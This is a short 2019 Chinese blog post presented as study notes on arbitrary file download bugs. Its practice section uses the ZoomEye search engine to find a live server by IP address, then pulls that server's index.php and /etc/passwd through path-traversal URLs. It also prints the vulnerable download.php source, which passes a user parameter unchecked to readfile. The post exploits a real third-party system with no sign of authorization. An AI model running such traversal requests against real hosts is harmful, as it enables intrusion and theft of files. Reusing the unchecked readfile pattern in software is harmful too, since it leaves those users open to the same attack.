任意文件下载漏洞学习

Writing
创建时间:
阅读:
  1. 简介
  2. 实战

简介

任意文件下载漏洞由于在处理下载脚本的时候没有做好对应的一个控制,导致下载文件的参数可控。从而下载其他路径下的文件
V5gSeJ.png

实战

上zoomye寻找关键字:download.php?path=

找到一个
V5gFW6.md.png

构造url下载

http://50.62.25.88/download.php?path=index.php

下载的主页
V5gASK.md.png

下载/etc/passwd

http://50.62.25.88/download.php?path=../../../../../../etc/passwd

V5gQYt.md.png

读取download.php查看其源码

<?php 
   header("Content-Type: application/octet-stream");
   header("Content-Disposition: attachment; filename=".$_GET['path']);
   readfile($_GET['path']);
?>

至此结束…..

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:任意文件下载漏洞学习

本文作者:九世

发布时间:2019-06-14, 20:39:11

最后更新:2019-06-14, 22:21:31

原始链接:http://jiushill.github.io/posts/71ea52cb.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录